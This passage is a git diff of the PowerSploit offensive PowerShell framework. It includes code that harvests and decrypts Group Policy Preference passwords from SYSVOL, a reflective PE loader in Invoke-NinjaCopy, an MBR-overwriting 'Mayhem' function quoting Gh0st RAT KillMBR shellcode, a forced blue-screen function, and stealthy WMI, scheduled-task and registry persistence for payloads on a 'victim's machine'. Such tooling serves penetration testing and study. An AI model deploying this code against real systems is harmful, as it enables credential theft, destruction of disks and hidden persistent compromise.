+                            $Changed = $_.ParentNode.changed
+                        }
+                        catch {
+                            Write-Verbose "[Get-GPPInnerField] Unable to retrieve ParentNode.changed for '$File'"
+                        }
+
+                        try {
+                            $NodeName = $_.ParentNode.ParentNode.LocalName
+                        }
+                        catch {
+                            Write-Verbose "[Get-GPPInnerField] Unable to retrieve ParentNode.ParentNode.LocalName for '$File'"
+                        }
+
+                        if (!($Password)) {$Password = '[BLANK]'}
+                        if (!($UserName)) {$UserName = '[BLANK]'}
+                        if (!($Changed)) {$Changed = '[BLANK]'}
+                        if (!($NewName)) {$NewName = '[BLANK]'}
+
+                        $GPPPassword = New-Object PSObject
+                        $GPPPassword | Add-Member Noteproperty 'UserName' $UserName
+                        $GPPPassword | Add-Member Noteproperty 'NewName' $NewName
+                        $GPPPassword | Add-Member Noteproperty 'Password' $Password
+                        $GPPPassword | Add-Member Noteproperty 'Changed' $Changed
+                        $GPPPassword | Add-Member Noteproperty 'File' $File
+                        $GPPPassword | Add-Member Noteproperty 'NodeName' $NodeName
+                        $GPPPassword | Add-Member Noteproperty 'Cpassword' $Cpassword
+                        $GPPPassword
                     }
-                    
-                    'Printers.xml' { 
-                        $Cpassword += , $Xml | Select-Xml "/Printers/SharedPrinter/Properties/@cpassword" | Select-Object -Expand Node | ForEach-Object {$_.Value}
-                        $UserName += , $Xml | Select-Xml "/Printers/SharedPrinter/Properties/@username" | Select-Object -Expand Node | ForEach-Object {$_.Value}
-                        $Changed += , $Xml | Select-Xml "/Printers/SharedPrinter/@changed" | Select-Object -Expand Node | ForEach-Object {$_.Value}
+                }
+            }
+        }
+        catch {
+            Write-Warning "[Get-GPPInnerField] Error parsing file '$File' : $_"
+        }
+    }
+
+    # helper function (adapted from PowerView) to enumerate the domain/forest trusts for a specified domain
+    function Get-DomainTrust {
+        [CmdletBinding()]
+        Param (
+            $Domain
+        )
+
+        if (Test-Connection -Count 1 -Quiet -ComputerName $Domain) {
+            try {
+                $DomainContext = New-Object System.DirectoryServices.ActiveDirectory.DirectoryContext('Domain', $Domain)
+                $DomainObject = [System.DirectoryServices.ActiveDirectory.Domain]::GetDomain($DomainContext)
+                if ($DomainObject) {
+                    $DomainObject.GetAllTrustRelationships() | Select-Object -ExpandProperty TargetName
+                }
+            }
+            catch {
+                Write-Verbose "[Get-DomainTrust] Error contacting domain '$Domain' : $_"
+            }
+
+            try {
+                $ForestContext = New-Object System.DirectoryServices.ActiveDirectory.DirectoryContext('Forest', $Domain)
+                $ForestObject = [System.DirectoryServices.ActiveDirectory.Forest]::GetForest($ForestContext)
+                if ($ForestObject) {
+                    $ForestObject.GetAllTrustRelationships() | Select-Object -ExpandProperty TargetName
+                }
+            }
+            catch {
+                Write-Verbose "[Get-DomainTrust] Error contacting forest '$Domain' (domain may not be a forest object) : $_"
+            }
+        }
+    }
+
+    # helper function (adapted from PowerView) to enumerate all reachable trusts from the current domain
+    function Get-DomainTrustMapping {
+        [CmdletBinding()]
+        Param ()
+
+        # keep track of domains seen so we don't hit infinite recursion
+        $SeenDomains = @{}
+
+        # our domain stack tracker
+        $Domains = New-Object System.Collections.Stack
+
+        try {
+            $CurrentDomain = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain() | Select-Object -ExpandProperty Name
+            $CurrentDomain
+        }
+        catch {
+            Write-Warning "[Get-DomainTrustMapping] Error enumerating current domain: $_"
+        }
+
+        if ($CurrentDomain -and $CurrentDomain -ne '') {
+            $Domains.Push($CurrentDomain)
+
+            while($Domains.Count -ne 0) {
+
+                $Domain = $Domains.Pop()
+
+                # if we haven't seen this domain before
+                if ($Domain -and ($Domain.Trim() -ne '') -and (-not $SeenDomains.ContainsKey($Domain))) {
+
+                    Write-Verbose "[Get-DomainTrustMapping] Enumerating trusts for domain: '$Domain'"
+
+                    # mark it as seen in our list
+                    $Null = $SeenDomains.Add($Domain, '')
+
+                    try {
+                        # get all the domain/forest trusts for this domain
+                        Get-DomainTrust -Domain $Domain | Sort-Object -Unique | ForEach-Object {
+                            # only output if we haven't already seen this domain and if it's pingable
+                            if (-not $SeenDomains.ContainsKey($_) -and (Test-Connection -Count 1 -Quiet -ComputerName $_)) {
+                                $Null = $Domains.Push($_)
+                                $_
+                            }
+                        }
                     }
-  
-                    'Drives.xml' { 
-                        $Cpassword += , $Xml | Select-Xml "/Drives/Drive/Properties/@cpassword" | Select-Object -Expand Node | ForEach-Object {$_.Value}
-                        $UserName += , $Xml | Select-Xml "/Drives/Drive/Properties/@username" | Select-Object -Expand Node | ForEach-Object {$_.Value}
-                        $Changed += , $Xml | Select-Xml "/Drives/Drive/@changed" | Select-Object -Expand Node | ForEach-Object {$_.Value} 
+                    catch {
+                        Write-Verbose "[Get-DomainTrustMapping] Error: $_"
                     }
                 }
-           }
-                     
-           foreach ($Pass in $Cpassword) {
-               Write-Verbose "Decrypting $Pass"
-               $DecryptedPassword = Get-DecryptedCpassword $Pass
-               Write-Verbose "Decrypted a password of $DecryptedPassword"
-               #append any new passwords to array
-               $Password += , $DecryptedPassword
-           }
-            
-            #put [BLANK] in variables
-            if (!($Password)) {$Password = '[BLANK]'}
-            if (!($UserName)) {$UserName = '[BLANK]'}
-            if (!($Changed)) {$Changed = '[BLANK]'}
-            if (!($NewName)) {$NewName = '[BLANK]'}
-                  
-            #Create custom object to output results
-            $ObjectProperties = @{'Passwords' = $Password;
-                                  'UserNames' = $UserName;
-                                  'Changed' = $Changed;
-                                  'NewName' = $NewName;
-                                  'File' = $File}
-                
-            $ResultsObject = New-Object -TypeName PSObject -Property $ObjectProperties
-            Write-Verbose "The password is between {} and may be more than one value."
-            if ($ResultsObject) {Return $ResultsObject} 
+            }
         }
-
-        catch {Write-Error $Error[0]}
     }
-    
+
     try {
-        #ensure that machine is domain joined and script is running as a domain account
-        if ( ( ((Get-WmiObject Win32_ComputerSystem).partofdomain) -eq $False ) -or ( -not $Env:USERDNSDOMAIN ) ) {
-            throw 'Machine is not a domain member or User is not a member of the domain.'
+        $XMLFiles = @()
+        $Domains = @()
+
+        $AllUsers = $Env:ALLUSERSPROFILE
+        if (-not $AllUsers) {
+            $AllUsers = 'C:\ProgramData'
+        }
+
+        # discover any locally cached GPP .xml files
+        Write-Verbose '[Get-GPPPassword] Searching local host for any cached GPP files'
+        $XMLFiles += Get-ChildItem -Path $AllUsers -Recurse -Include 'Groups.xml','Services.xml','Scheduledtasks.xml','DataSources.xml','Printers.xml','Drives.xml' -Force -ErrorAction SilentlyContinue
+
+        if ($SearchForest) {
+            Write-Verbose '[Get-GPPPassword] Searching for all reachable trusts'
+            $Domains += Get-DomainTrustMapping
         }
+        else {
+            if ($Server) {
+                $Domains += , $Server
+            }
+            else {
+                # in case we're in a SYSTEM context
+                $Domains += , [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain() | Select-Object -ExpandProperty Name
+            }
+        }
+
+        $Domains = $Domains | Where-Object {$_} | Sort-Object -Unique
+
+        ForEach ($Domain in $Domains) {
+            # discover potential domain GPP files containing passwords, not complaining in case of denied access to a directory
+            Write-Verbose "[Get-GPPPassword] Searching \\$Domain\SYSVOL\*\Policies. This could take a while."
+            $DomainXMLFiles = Get-ChildItem -Force -Path "\\$Domain\SYSVOL\*\Policies" -Recurse -ErrorAction SilentlyContinue -Include @('Groups.xml','Services.xml','Scheduledtasks.xml','DataSources.xml','Printers.xml','Drives.xml')
+
+            if($DomainXMLFiles) {
+                $XMLFiles += $DomainXMLFiles
+            }
+        }
+
+        if ( -not $XMLFiles ) { throw '[Get-GPPPassword] No preference files found.' }
+
+        Write-Verbose "[Get-GPPPassword] Found $($XMLFiles | Measure-Object | Select-Object -ExpandProperty Count) files that could contain passwords."
 
-        #discover potential files containing passwords ; not complaining in case of denied access to a directory
-        Write-Verbose "Searching \\$Server\SYSVOL. This could take a while."
-        $XMlFiles = Get-ChildItem -Path "\\$Server\SYSVOL" -Recurse -ErrorAction SilentlyContinue -Include 'Groups.xml','Services.xml','Scheduledtasks.xml','DataSources.xml','Printers.xml','Drives.xml'
-    
-        if ( -not $XMlFiles ) {throw 'No preference files found.'}
-
-        Write-Verbose "Found $($XMLFiles | Measure-Object | Select-Object -ExpandProperty Count) files that could contain passwords."
-    
-        foreach ($File in $XMLFiles) {
-            $Result = (Get-GppInnerFields $File.Fullname)
-            Write-Output $Result
+        ForEach ($File in $XMLFiles) {
+            $Result = (Get-GppInnerField $File.Fullname)
+            $Result
         }
     }
 
-    catch {Write-Error $Error[0]}
-}
+    catch { Write-Error $Error[0] }
+}
\ No newline at end of file
diff --git a/Exfiltration/Invoke-NinjaCopy.ps1 b/Exfiltration/Invoke-NinjaCopy.ps1
index f22d5f5..e3eb8f0 100644
--- a/Exfiltration/Invoke-NinjaCopy.ps1
+++ b/Exfiltration/Invoke-NinjaCopy.ps1
@@ -2205,7 +2205,7 @@ $RemoteScriptBlock = {
 		$PEInfo = Get-PEBasicInfo -PEBytes $PEBytes -Win32Types $Win32Types
 		$OriginalImageBase = $PEInfo.OriginalImageBase
 		$NXCompatible = $true
-		if (($PEInfo.DllCharacteristics -band $Win32Constants.IMAGE_DLLCHARACTERISTICS_NX_COMPAT) -ne $Win32Constants.IMAGE_DLLCHARACTERISTICS_NX_COMPAT)
+		if (([Int] $PEInfo.DllCharacteristics -band $Win32Constants.IMAGE_DLLCHARACTERISTICS_NX_COMPAT) -ne $Win32Constants.IMAGE_DLLCHARACTERISTICS_NX_COMPAT)
 		{
 			Write-Warning "PE is not compatible with DEP, might cause issues" -WarningAction Continue
 			$NXCompatible = $false
@@ -2263,7 +2263,7 @@ $RemoteScriptBlock = {
 		Write-Verbose "Allocating memory for the PE and write its headers to memory"
 		
 		[IntPtr]$LoadAddr = [IntPtr]::Zero
-		if (($PEInfo.DllCharacteristics -band $Win32Constants.IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE) -ne $Win32Constants.IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE)
+		if (([Int] $PEInfo.DllCharacteristics -band $Win32Constants.IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE) -ne $Win32Constants.IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE)
 		{
 			Write-Warning "PE file being reflectively loaded is not ASLR compatible. If the loading fails, try restarting PowerShell and trying again" -WarningAction Continue
 			[IntPtr]$LoadAddr = $OriginalImageBase
diff --git a/Mayhem/Mayhem.psm1 b/Mayhem/Mayhem.psm1
index 0baaf3e..5fbdde2 100644
--- a/Mayhem/Mayhem.psm1
+++ b/Mayhem/Mayhem.psm1
@@ -3,109 +3,109 @@ function Set-MasterBootRecord
 <#
 .SYNOPSIS
 
-    Proof of concept code that overwrites the master boot record with the
-    message of your choice.
-
-    PowerSploit Function: Set-MasterBootRecord
-    Author: Matthew Graeber (@mattifestation) and Chris Campbell (@obscuresec)
-    License: BSD 3-Clause
-    Required Dependencies: None
-    Optional Dependencies: None
- 
+Proof of concept code that overwrites the master boot record with the
+message of your choice.
+
+PowerSploit Function: Set-MasterBootRecord  
+Author: Matthew Graeber (@mattifestation) and Chris Campbell (@obscuresec)  
+License: BSD 3-Clause  
+Required Dependencies: None  
+Optional Dependencies: None  
+
 .DESCRIPTION
 
-    Set-MasterBootRecord is proof of concept code designed to show that it is
-    possible with PowerShell to overwrite the MBR. This technique was taken
-    from a public malware sample. This script is inteded solely as proof of
-    concept code.
+Set-MasterBootRecord is proof of concept code designed to show that it is
+possible with PowerShell to overwrite the MBR. This technique was taken
+from a public malware sample. This script is inteded solely as proof of
+concept code.
 
 .PARAMETER BootMessage
 
-    Specifies the message that will be displayed upon making your computer a brick.
+Specifies the message that will be displayed upon making your computer a brick.
 
 .PARAMETER RebootImmediately
 
-    Reboot the machine immediately upon overwriting the MBR.
+Reboot the machine immediately upon overwriting the MBR.
 
 .PARAMETER Force
 
-    Suppress the warning prompt.
+Suppress the warning prompt.
 
 .EXAMPLE
 
-    Set-MasterBootRecord -BootMessage 'This is what happens when you fail to defend your network. #CCDC'
+Set-MasterBootRecord -BootMessage 'This is what happens when you fail to defend your network. #CCDC'
 
 .NOTES
 
-    Obviously, this will only work if you have a master boot record to
-    overwrite. This won't work if you have a GPT (GUID partition table)
-#>
+Obviously, this will only work if you have a master boot record to
+overwrite. This won't work if you have a GPT (GUID partition table).
 
-<#
 This code was inspired by the Gh0st RAT source code seen here (acquired from: http://webcache.googleusercontent.com/search?q=cache:60uUuXfQF6oJ:read.pudn.com/downloads116/sourcecode/hack/trojan/494574/gh0st3.6_%25E6%25BA%2590%25E4%25BB%25A3%25E7%25A0%2581/gh0st/gh0st.cpp__.htm+&cd=3&hl=en&ct=clnk&gl=us):
 
-// CGh0stApp message handlers 
- 
-unsigned char scode[] = 
-"\xb8\x12\x00\xcd\x10\xbd\x18\x7c\xb9\x18\x00\xb8\x01\x13\xbb\x0c" 
-"\x00\xba\x1d\x0e\xcd\x10\xe2\xfe\x49\x20\x61\x6d\x20\x76\x69\x72" 
-"\x75\x73\x21\x20\x46\x75\x63\x6b\x20\x79\x6f\x75\x20\x3a\x2d\x29"; 
- 
-int CGh0stApp::KillMBR() 
-{ 
-	HANDLE hDevice; 
-	DWORD dwBytesWritten, dwBytesReturned; 
-	BYTE pMBR[512] = {0}; 
-	 
-	// ????MBR 
-	memcpy(pMBR, scode, sizeof(scode) - 1); 
-	pMBR[510] = 0x55; 
-	pMBR[511] = 0xAA; 
-	 
-	hDevice = CreateFile 
-		( 
-		"\\\\.\\PHYSICALDRIVE0", 
-		GENERIC_READ | GENERIC_WRITE, 
-		FILE_SHARE_READ | FILE_SHARE_WRITE, 
-		NULL, 
-		OPEN_EXISTING, 
-		0, 
-		NULL 
-		); 
-	if (hDevice == INVALID_HANDLE_VALUE) 
-		return -1; 
-	DeviceIoControl 
-		( 
-		hDevice,  
-		FSCTL_LOCK_VOLUME,  
-		NULL,  
-		0,  
-		NULL,  
-		0,  
-		&dwBytesReturned,  
-		NULL 
-		); 
-	// ?????? 
-	WriteFile(hDevice, pMBR, sizeof(pMBR), &dwBytesWritten, NULL); 
-	DeviceIoControl 
-		( 
-		hDevice,  
-		FSCTL_UNLOCK_VOLUME,  
-		NULL,  
-		0,  
-		NULL,  
-		0,  
-		&dwBytesReturned,  
-		NULL 
-		); 
-	CloseHandle(hDevice); 
- 
-	ExitProcess(-1); 
-	return 0; 
-} 
+// CGh0stApp message handlers
+
+unsigned char scode[] =
+"\xb8\x12\x00\xcd\x10\xbd\x18\x7c\xb9\x18\x00\xb8\x01\x13\xbb\x0c"
+"\x00\xba\x1d\x0e\xcd\x10\xe2\xfe\x49\x20\x61\x6d\x20\x76\x69\x72"
+"\x75\x73\x21\x20\x46\x75\x63\x6b\x20\x79\x6f\x75\x20\x3a\x2d\x29";
+
+int CGh0stApp::KillMBR()
+{
+	HANDLE hDevice;
+	DWORD dwBytesWritten, dwBytesReturned;
+	BYTE pMBR[512] = {0};
+
+	// ????MBR
+	memcpy(pMBR, scode, sizeof(scode) - 1);
+	pMBR[510] = 0x55;
+	pMBR[511] = 0xAA;
+
+	hDevice = CreateFile
+		(
+		"\\\\.\\PHYSICALDRIVE0",
+		GENERIC_READ | GENERIC_WRITE,
+		FILE_SHARE_READ | FILE_SHARE_WRITE,
+		NULL,
+		OPEN_EXISTING,
+		0,
+		NULL
+		);
+	if (hDevice == INVALID_HANDLE_VALUE)
+		return -1;
+	DeviceIoControl
+		(
+		hDevice,
+		FSCTL_LOCK_VOLUME,
+		NULL,
+		0,
+		NULL,
+		0,
+		&dwBytesReturned,
+		NUL
+		)
+	// ??????
+	WriteFile(hDevice, pMBR, sizeof(pMBR), &dwBytesWritten, NULL);
+	DeviceIoControl
+		(
+		hDevice,
+		FSCTL_UNLOCK_VOLUME,
+		NULL,
+		0,
+		NULL,
+		0,
+		&dwBytesReturned,
+		NULL
+		);
+	CloseHandle(hDevice);
+
+	ExitProcess(-1);
+	return 0;
+}
 #>
 
-    [CmdletBinding(SupportsShouldProcess = $True, ConfirmImpact = 'High')] Param (
+    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSAvoidUsingWMICmdlet', '')]
+    [CmdletBinding(SupportsShouldProcess = $True, ConfirmImpact = 'High')]
+    Param (
         [ValidateLength(1, 479)]
         [String]
         $BootMessage = 'Stop-Crying; Get-NewHardDrive',
@@ -220,7 +220,7 @@ int CGh0stApp::KillMBR()
     $MBRBytes = [Runtime.InteropServices.Marshal]::AllocHGlobal($MBRSize)
 
     # Zero-initialize the allocated unmanaged memory
-    0..511 | % { [Runtime.InteropServices.Marshal]::WriteByte([IntPtr]::Add($MBRBytes, $_), 0) }
+    0..511 | ForEach-Object { [Runtime.InteropServices.Marshal]::WriteByte([IntPtr]::Add($MBRBytes, $_), 0) }
 
     [Runtime.InteropServices.Marshal]::Copy($MBRInfectionCode, 0, $MBRBytes, $MBRInfectionCode.Length)
 
@@ -272,11 +272,11 @@ function Set-CriticalProcess
 
 Causes your machine to blue screen upon exiting PowerShell.
 
-PowerSploit Function: Set-CriticalProcess
-Author: Matthew Graeber (@mattifestation)
-License: BSD 3-Clause
-Required Dependencies: None
-Optional Dependencies: None
+PowerSploit Function: Set-CriticalProcess  
+Author: Matthew Graeber (@mattifestation)  
+License: BSD 3-Clause  
+Required Dependencies: None  
+Optional Dependencies: None  
 
 .PARAMETER ExitImmediately
 
@@ -300,7 +300,9 @@ Set-CriticalProcess -Force -Verbose
 
 #>
 
-    [CmdletBinding(SupportsShouldProcess = $True, ConfirmImpact = 'High')] Param (
+    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseDeclaredVarsMoreThanAssignments', '')]
+    [CmdletBinding(SupportsShouldProcess = $True, ConfirmImpact = 'High')]
+    Param (
         [Switch]
         $Force,
 
@@ -319,7 +321,7 @@ Set-CriticalProcess -Force -Verbose
     {
         $Response = $psCmdlet.ShouldContinue('Have you saved all your work?', 'The machine will blue screen when you exit PowerShell.')
     }
-    
+
     if (!$Response)
     {
         return
diff --git a/Persistence/Persistence.psm1 b/Persistence/Persistence.psm1
index 0861af6..7e4bbb9 100644
--- a/Persistence/Persistence.psm1
+++ b/Persistence/Persistence.psm1
@@ -3,84 +3,86 @@ function New-ElevatedPersistenceOption
 <#
 .SYNOPSIS
 
-    Configure elevated persistence options for the Add-Persistence function.
-
-    PowerSploit Function: New-ElevatedPersistenceOption
-    Author: Matthew Graeber (@mattifestation)
-    License: BSD 3-Clause
-    Required Dependencies: None
-    Optional Dependencies: None
- 
+Configure elevated persistence options for the Add-Persistence function.
+
+PowerSploit Function: New-ElevatedPersistenceOption  
+Author: Matthew Graeber (@mattifestation)  
+License: BSD 3-Clause  
+Required Dependencies: None  
+Optional Dependencies: None  
+
 .DESCRIPTION
 
-    New-ElevatedPersistenceOption allows for the configuration of elevated persistence options. The output of this function is a required parameter of Add-Persistence. Available persitence options in order of stealth are the following: permanent WMI subscription, scheduled task, and registry.
+New-ElevatedPersistenceOption allows for the configuration of elevated persistence options. The output of this function is a required parameter of Add-Persistence. Available persitence options in order of stealth are the following: permanent WMI subscription, scheduled task, and registry.
 
 .PARAMETER PermanentWMI
 
-    Persist via a permanent WMI event subscription. This option will be the most difficult to detect and remove.
+Persist via a permanent WMI event subscription. This option will be the most difficult to detect and remove.
 
-    Detection Difficulty:        Difficult
-    Removal Difficulty:          Difficult
-    User Detectable?             No
+Detection Difficulty:        Difficult
+Removal Difficulty:          Difficult
+User Detectable?             No
 
 .PARAMETER ScheduledTask
 
-    Persist via a scheduled task.
+Persist via a scheduled task.
 
-    Detection Difficulty:        Moderate
-    Removal Difficulty:          Moderate
-    User Detectable?             No
+Detection Difficulty:        Moderate
+Removal Difficulty:          Moderate
+User Detectable?             No
 
 .PARAMETER Registry
 
-    Persist via the HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run registry key. Note: This option will briefly pop up a PowerShell console to the user.
+Persist via the HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run registry key. Note: This option will briefly pop up a PowerShell console to the user.
 
-    Detection Difficulty:        Easy
-    Removal Difficulty:          Easy
-    User Detectable?             Yes
+Detection Difficulty:        Easy
+Removal Difficulty:          Easy
+User Detectable?             Yes
 
 .PARAMETER AtLogon
 
-    Starts the payload upon any user logon.
+Starts the payload upon any user logon.
 
 .PARAMETER AtStartup
 
-    Starts the payload within 240 and 325 seconds of computer startup.
+Starts the payload within 240 and 325 seconds of computer startup.
 
 .PARAMETER OnIdle
 
-    Starts the payload after one minute of idling.
+Starts the payload after one minute of idling.
 
 .PARAMETER Daily
 
-    Starts the payload daily.
+Starts the payload daily.
 
 .PARAMETER Hourly
 
-    Starts the payload hourly.
+Starts the payload hourly.
 
 .PARAMETER At
 
-    Starts the payload at the specified time. You may specify times in the following formats: '12:31 AM', '2 AM', '23:00:00', or '4:06:26 PM'.
+Starts the payload at the specified time. You may specify times in the following formats: '12:31 AM', '2 AM', '23:00:00', or '4:06:26 PM'.
 
 .EXAMPLE
 
-    C:\PS> $ElevatedOptions = New-ElevatedPersistenceOption -PermanentWMI -Daily -At '3 PM'
+$ElevatedOptions = New-ElevatedPersistenceOption -PermanentWMI -Daily -At '3 PM'
 
 .EXAMPLE
 
-    C:\PS> $ElevatedOptions = New-ElevatedPersistenceOption -Registry -AtStartup
+$ElevatedOptions = New-ElevatedPersistenceOption -Registry -AtStartup
 
 .EXAMPLE
 
-    C:\PS> $ElevatedOptions = New-ElevatedPersistenceOption -ScheduledTask -OnIdle
+$ElevatedOptions = New-ElevatedPersistenceOption -ScheduledTask -OnIdle
 
 .LINK
 
-    http://www.exploit-monday.com
+http://www.exploit-monday.com
 #>
 
-    [CmdletBinding()] Param (
+    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseShouldProcessForStateChangingFunctions', '')]
+    [CmdletBinding()]
+    Param (
         [Parameter( ParameterSetName = 'PermanentWMIDaily', Mandatory = $True )]
         [Parameter( ParameterSetName = 'PermanentWMIAtStartup', Mandatory = $True )]
         [Switch]
@@ -189,68 +191,70 @@ function New-UserPersistenceOption
 <#
 .SYNOPSIS
 
-    Configure user-level persistence options for the Add-Persistence function.
+Configure user-level persistence options for the Add-Persistence function.
+
+PowerSploit Function: New-UserPersistenceOption  
+Author: Matthew Graeber (@mattifestation)  
+License: BSD 3-Clause  
+Required Dependencies: None  
+Optional Dependencies: None  
 
-    PowerSploit Function: New-UserPersistenceOption
-    Author: Matthew Graeber (@mattifestation)
-    License: BSD 3-Clause
-    Required Dependencies: None
-    Optional Dependencies: None
- 
 .DESCRIPTION
 
-    New-UserPersistenceOption allows for the configuration of elevated persistence options. The output of this function is a required parameter of Add-Persistence. Available persitence options in order of stealth are the following: scheduled task, registry.
+New-UserPersistenceOption allows for the configuration of elevated persistence options. The output of this function is a required parameter of Add-Persistence. Available persitence options in order of stealth are the following: scheduled task, registry.
 
 .PARAMETER ScheduledTask
 
-    Persist via a scheduled task.
+Persist via a scheduled task.
 
-    Detection Difficulty:        Moderate
-    Removal Difficulty:          Moderate
-    User Detectable?             No
+Detection Difficulty:        Moderate
+Removal Difficulty:          Moderate
+User Detectable?             No
 
 .PARAMETER Registry
 
-    Persist via the HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run registry key. Note: This option will briefly pop up a PowerShell console to the user.
+Persist via the HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run registry key. Note: This option will briefly pop up a PowerShell console to the user.
 
-    Detection Difficulty:        Easy
-    Removal Difficulty:          Easy
-    User Detectable?             Yes
+Detection Difficulty:        Easy
+Removal Difficulty:          Easy
+User Detectable?             Yes
 
 .PARAMETER AtLogon
 
-    Starts the payload upon any user logon.
+Starts the payload upon any user logon.
 
 .PARAMETER OnIdle
 
-    Starts the payload after one minute of idling.
+Starts the payload after one minute of idling.
 
 .PARAMETER Daily
 
-    Starts the payload daily.
+Starts the payload daily.
 
 .PARAMETER Hourly
 
-    Starts the payload hourly.
+Starts the payload hourly.
 
 .PARAMETER At
 
-    Starts the payload at the specified time. You may specify times in the following formats: '12:31 AM', '2 AM', '23:00:00', or '4:06:26 PM'.
+Starts the payload at the specified time. You may specify times in the following formats: '12:31 AM', '2 AM', '23:00:00', or '4:06:26 PM'.
 
 .EXAMPLE
 
-    C:\PS> $UserOptions = New-UserPersistenceOption -Registry -AtLogon
+$UserOptions = New-UserPersistenceOption -Registry -AtLogon
 
 .EXAMPLE
 
-    C:\PS> $UserOptions = New-UserPersistenceOption -ScheduledTask -OnIdle
+$UserOptions = New-UserPersistenceOption -ScheduledTask -OnIdle
 
 .LINK
 
-    http://www.exploit-monday.com
+http://www.exploit-monday.com
 #>
 
-    [CmdletBinding()] Param (
+    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseShouldProcessForStateChangingFunctions', '')]
+    [CmdletBinding()]
+    Param (
         [Parameter( ParameterSetName = 'ScheduledTaskDaily', Mandatory = $True )]
         [Parameter( ParameterSetName = 'ScheduledTaskHourly', Mandatory = $True )]
         [Parameter( ParameterSetName = 'ScheduledTaskOnIdle', Mandatory = $True )]
@@ -333,99 +337,104 @@ function Add-Persistence
 <#
 .SYNOPSIS
 
-    Add persistence capabilities to a script.
+Add persistence capabilities to a script.
+
+PowerSploit Function: Add-Persistence  
+Author: Matthew Graeber (@mattifestation)  
+License: BSD 3-Clause  
+Required Dependencies: New-ElevatedPersistenceOption, New-UserPersistenceOption  
+Optional Dependencies: None  
 
-    PowerSploit Function: Add-Persistence
-    Author: Matthew Graeber (@mattifestation)
-    License: BSD 3-Clause
-    Required Dependencies: New-ElevatedPersistenceOption, New-UserPersistenceOption
-    Optional Dependencies: None
- 
 .DESCRIPTION
 
-    Add-Persistence will add persistence capabilities to any script or scriptblock. This function will output both the newly created script with persistence capabilities as well a script that will remove a script after it has been persisted.
+Add-Persistence will add persistence capabilities to any script or scriptblock. This function will output both the newly created script with persistence capabilities as well a script that will remove a script after it has been persisted.
 
 .PARAMETER ScriptBlock
 
-    Specifies a scriptblock containing your payload.
+Specifies a scriptblock containing your payload.
 
 .PARAMETER FilePath
 
-    Specifies the path to your payload.
+Specifies the path to your payload.
 
 .PARAMETER ElevatedPersistenceOption
 
-    Specifies the trigger for the persistent payload if the target is running elevated.
-    You must run New-ElevatedPersistenceOption to generate this argument.
+Specifies the trigger for the persistent payload if the target is running elevated.
+You must run New-ElevatedPersistenceOption to generate this argument.
 
 .PARAMETER UserPersistenceOption
 
-    Specifies the trigger for the persistent payload if the target is not running elevated.
-    You must run New-UserPersistenceOption to generate this argument.
+Specifies the trigger for the persistent payload if the target is not running elevated.
+You must run New-UserPersistenceOption to generate this argument.
 
 .PARAMETER PersistenceScriptName
 
-    Specifies the name of the function that will wrap the original payload. The default value is 'Update-Windows'.
+Specifies the name of the function that will wrap the original payload. The default value is 'Update-Windows'.
 
 .PARAMETER DoNotPersistImmediately
 
-    Output only the wrapper function for the original payload. By default, Add-Persistence will output a script that will automatically attempt to persist (e.g. it will end with 'Update-Windows -Persist'). If you are in a position where you are running in memory but want to persist at a later time, use this option.
+Output only the wrapper function for the original payload. By default, Add-Persistence will output a script that will automatically attempt to persist (e.g. it will end with 'Update-Windows -Persist'). If you are in a position where you are running in memory but want to persist at a later time, use this option.
 
 .PARAMETER PersistentScriptFilePath
 
-    Specifies the path where you would like to output the persistence script. By default, Add-Persistence will write the removal script to 'Persistence.ps1' in the current directory.
+Specifies the path where you would like to output the persistence script. By default, Add-Persistence will write the removal script to 'Persistence.ps1' in the current directory.
 
 .PARAMETER RemovalScriptFilePath
 
-    Specifies the path where you would like to output a script that will remove the persistent payload. By default, Add-Persistence will write the removal script to 'RemovePersistence.ps1' in the current directory.
+Specifies the path where you would like to output a script that will remove the persistent payload. By default, Add-Persistence will write the removal script to 'RemovePersistence.ps1' in the current directory.
 
 .PARAMETER PassThru
 
-    Outputs the contents of the persistent script to the pipeline. This option is useful when you want to write the original persistent script to disk and pass the script to Out-EncodedCommand via the pipeline.
+Outputs the contents of the persistent script to the pipeline. This option is useful when you want to write the original persistent script to disk and pass the script to Out-EncodedCommand via the pipeline.
 
 .INPUTS
 
-    None
+None
 
-    Add-Persistence cannot receive any input from the pipeline.
+Add-Persistence cannot receive any input from the pipeline.
 
 .OUTPUTS
 
-    System.Management.Automation.ScriptBlock
+System.Management.Automation.ScriptBlock
 
-    If the '-PassThru' switch is provided, Add-Persistence will output a scriptblock containing the contents of the persistence script.
+If the '-PassThru' switch is provided, Add-Persistence will output a scriptblock containing the contents of the persistence script.
 
 .NOTES
 
-    When the persistent script executes, it will not generate any meaningful output as it was designed to run as silently as possible on the victim's machine.
+When the persistent script executes, it will not generate any meaningful output as it was designed to run as silently as possible on the victim's machine.
 
 .EXAMPLE
 
-    C:\PS>$ElevatedOptions = New-ElevatedPersistenceOption -PermanentWMI -Daily -At '3 PM'
-    C:\PS>$UserOptions = New-UserPersistenceOption -Registry -AtLogon
-    C:\PS>Add-Persistence -FilePath .\EvilPayload.ps1 -ElevatedPersistenceOption $ElevatedOptions -UserPersistenceOption $UserOptions -Verbose
+$ElevatedOptions = New-ElevatedPersistenceOption -PermanentWMI -Daily -At '3 PM'
+$UserOptions = New-UserPersistenceOption -Registry -AtLogon
+Add-Persistence -FilePath .\EvilPayload.ps1 -ElevatedPersistenceOption $ElevatedOptions -UserPersistenceOption $UserOptions -Verbose
 
-    Description
-    -----------
-    Creates a script containing the contents of EvilPayload.ps1 that when executed with the '-Persist' switch will persist the payload using its respective persistence mechanism (user-mode vs. elevated) determined at runtime.
+Description
+-----------
+Creates a script containing the contents of EvilPayload.ps1 that when executed with the '-Persist' switch will persist the payload using its respective persistence mechanism (user-mode vs. elevated) determined at runtime.
 
 .EXAMPLE
 
